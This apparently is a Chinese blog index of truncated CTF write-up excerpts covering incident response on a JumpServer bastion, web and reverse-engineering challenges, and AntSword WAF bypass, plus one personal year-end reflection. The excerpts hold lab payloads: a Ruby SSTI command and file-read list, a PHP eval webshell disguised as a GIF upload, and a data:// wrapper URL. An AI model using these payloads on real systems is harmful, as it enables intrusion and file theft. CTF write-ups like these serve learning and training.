第一届帕鲁杯-CTF应急响应挑战赛部分wp
\1. 签到 提交:[堡垒机的flag标签的值]
登上jumpserver 点击更多选项,点即可
第一届帕鲁杯-CTF应急响应挑战赛部分wp
赛题:https://pan.baidu.com/s/1NtC9RkO2MgG__oTffWYiRw?pwd=kc2y
赛题文件:应急响应模块说明手册.pdf 应急响应模块说明手册.pdf
应急响应-1题目要求:找到JumpServer堡垒机中flag标签的值。
提交格式:[堡垒机中flag标签的值]
登上jumpserver就可以了点控制台的更多选项里面有个标签值即可
应急响应-2题目要求:提交攻击者第一次登录时间。
提交格式:[2024/00/00/00:00:00]找到日志审计,查看登录日志,选一下时间,近一年的,
ip为192.168.20.123的时间
flag : [2024/04/11/14:21:18]
应急响应-3题目要求:提交攻击者源IP。
提交格式:[0.0.0.0]
因为后面test01的用户执行了jump server的rce,可能是nat转过来的
flag:192.168.1.4
应急响应-4题目要求:提交攻者使用的cve编号。
提交格式:[CVE-0000-0000]
在审计台的日志审计中,有一个作业日志
test执行了两个rce
...
antsword-bypasswaf
antsword-php改造1.前置知识这里笔者不在讲解antsword的功能等等了,这里直接看一下蚁剑的核心文件。
123456789101112131415161718192021222324252627282930313233343536373839404142# $ tree -l 1 -d ./── base├── core│ ├── asp│ │ ├── decoder│ │ ├── encoder│ │ └── template│ │ └── database│ ├── aspx│ │ ├── decoder│ │ ├── encoder│ │ └── template│ │ └── database│ ├── custom│ │ ├── decoder│ │ ├── encoder│ │ └── template│ │ └── database│ ├── php│ │ ├── decoder│ │ ├── encod ...
nssctfweb刷题记录
[GDOUCTF 2023]泄露的伪装
orzorz.php
12345678910111213<?phperror_reporting(0);if(isset($_GET['cxk'])){ $cxk=$_GET['cxk']; if(file_get_contents($cxk)=="ctrl"){ echo $flag; }else{ echo "洗洗睡吧"; }}else{ echo "nononoononoonono";}?> nononoononoonono
http://node5.anna.nssctf.cn:28206/orzorz.php?cxk=data://text/plain,ctrl
[NISACTF 2022]level-uprobots里
md5强碰撞
1array1=%4d%c9%68%ff%0e%e3 ...
polarctfre刷题记录
shell32bit 有upx的壳,解一下
ida即可 shift+f12
加加减减
my2023
又到了一年一度的总结时候了,转年一年又过去了。时间是过的真快啊。转眼间,大学的生活已经结束了,五年的大学生活,想想这五年的大学生活,好像也没有学到什么知识,但是好像有学到了一些知识。比上不足比下有余吧。
五年的大学生活,总结下来,就是感谢吧,感谢父亲和姐姐给我钱上大学,没有他们,或许我的大学都不能完成。感谢信安二班帮助过我的同学、以及对我特别照顾的老师们。感谢大数据一班帮助过我的同学们,以及对我特别照顾的老师们并且给我非常重要锻炼自己的机会。当然最重要的还是在大学的最后一年找到一个非常非常优秀的女朋友,陪我走过了最后一年的大学的时光。二月份一个以前hw认识的好朋友,带我参加了cavd2023汽车信息安全春季赛,打到最后也没有打出来什么成果,倒是坐了坐tesla,车挺不错的,就是太贵了。最后大气的中汽研还给了个小米的螺丝刀,感谢大哥带我打比赛,下次我还去。
接下来就是四月底了,三个好大哥带我去福州打比赛了,哦对了,还有两个非常非常好的老师。那是我人生中第一次坐飞机,说实话其实非常害怕的。尤其是第一次坐的时候,飞机上升的时候,那种腾空的感觉确实不太好受。不过最后成绩还是不错的,或许最后那个 ...
HGAME-2024-WEEK-2-部分wp
WEBWhat the cow say?经过测试是ruby的ssti,默认的输入有给了尖括号了,而且我看网上的payload,都带=
123456789<%= system("whoami") %> #Execute code<%= Dir.entries('/') %> #List folder<%= File.open('/etc/passwd').read %> #Read file<%= system('cat /etc/passwd') %><%= `ls /` %><%= IO.popen('ls /').readlines() %><% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%><% require ' ...
BeginCTF部分wp
miscTupper下载到压缩包后,解压可以看到有许多txt文件,每个里面可能是base64,写个脚本提取出来(找gpt)
1234567891011121314151617181920import os# 指定目录路径directory = 'G:\\ctf\\tupper'# 指定输出文件路径output_file = 'D:\\vscodework\\ctf\\beginctf\\output.txt'# 获取目录下的所有文件名,并按数字排序file_names = [f for f in os.listdir(directory) if f.endswith('.txt')]file_names.sort(key=lambda x: int(x[:-4]))# 遍历文件名列表,并将内容写入输出文件中with open(output_file, 'w') as f: for file_name in file_names: file_path = os.path.join(dire ...
HGAME-2024-WEEK-1-部分wp
webreverseezIDA下载程序直接,记事本右键打开就可以了,
ezASM1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162section .data c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17, 80, 81, 17, 95, 34 flag db 33 dup(0) format db "plz input your flag: ", 0 success db "Congratulations!", 0 failure db "Sry, plz try again", 0section .text ...
polarctfweb刷题记录2
webezupload文件上传,随便穿一个东西发现需要传gif,改一个
123Content-Type: image/gifGIF89A<?php eval($_POST['a']);?>
即可
自由的文件上传系统文件上传+文件包含随意传个文件,包含一下即可
代码审计1给了源码
1234567891011<?phphighlight_file(__FILE__);include('flag.php');$sys = $_GET['sys'];if (preg_match("|flag|", $xsx)) { die("flag is no here!");} else { $xsx = $_GET['xsx']; echo new $sys($xsx);}
当我们看到new $a($b)格式的字样。说明这是一道php原生类利用的题目。
这道题是文件读取类:SplFileObj ...